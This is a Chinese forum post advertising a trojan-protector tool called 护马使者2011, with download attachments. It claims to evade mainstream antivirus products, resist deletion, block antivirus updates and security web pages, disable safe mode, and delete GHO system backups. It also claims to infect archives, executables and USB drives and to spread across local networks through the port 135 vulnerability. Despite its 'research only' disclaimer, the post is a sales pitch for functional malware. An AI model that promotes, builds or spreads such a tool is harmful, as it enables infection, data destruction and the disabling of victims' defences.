软件名称:护马使者2011 v6.0{感染压缩包+反杀模式+随机复活}
版本号:2010/11/09 通过 卡巴 瑞星 金山 eset nod32 360杀毒 微点 小红伞 等国内外主流杀软 最新病毒库检测
注:本程序未使用任何HOOK钩子,不会与你的小马产生任何冲突,可放心使用。本程序乃VC++编写,不加壳200K,加压缩壳后只有70K。生成后,用UPX加壳(本程序目录下为你准备了UPX壳),减小体积,当然,你也可以用自己的加密壳。本程序支持任何壳。
主要功能及特色:(养马人(插件)的好帮手)
----------------------------------------------------------------------------
(* 注:本程序只可用来研究,不可用来做违法事宜,作者不承担任何后果 *)
使用说明及注意事项:
1.程序采用双方式自启动项(能过360安全卫士,不会有提示)
2.程序采用了特殊方法对自身实行了保护(如超级巡警的暴力删除,金山的文件
粉碎,卡巴的直接移动到隔离区等都对本软件无效)
2.程序采用双进程守护方式运行
3.运行后延时3分钟下载。
4.智能模式禁止杀软(防火墙)更新升级(目前仅支持360,金山毒霸)。
5.感染压缩包,扫描 DEFGHI 6大磁盘分区,如发现有 RAR ZIP TAR TGZ CAB 等压
缩文件则直接进行感染
6.感染exe文件(扫描 DEFGHI 6大磁盘分区(排除C盘),如发现有exe可执行文件则直接进行感染。
7.删除磁盘GHO文件功能,扫描 DEFGHI 6大磁盘分区,如找到扩展名为GHO的文
件,则直接删除
8.程序仍然采用网页关键字查杀方式,以便对在线 查毒,杀毒,下载专杀,等关
键字进行屏蔽,尽可能的保护自己。(关键字可自行添加)
9.屏蔽系统安全模式
10.采用135漏洞,对内网用户进行感染。
11.感染U盘。(当U盘插入时则感染)
使用注意事项:
见主程序!!!
[attachment=4243529]
[attachment=4243548]
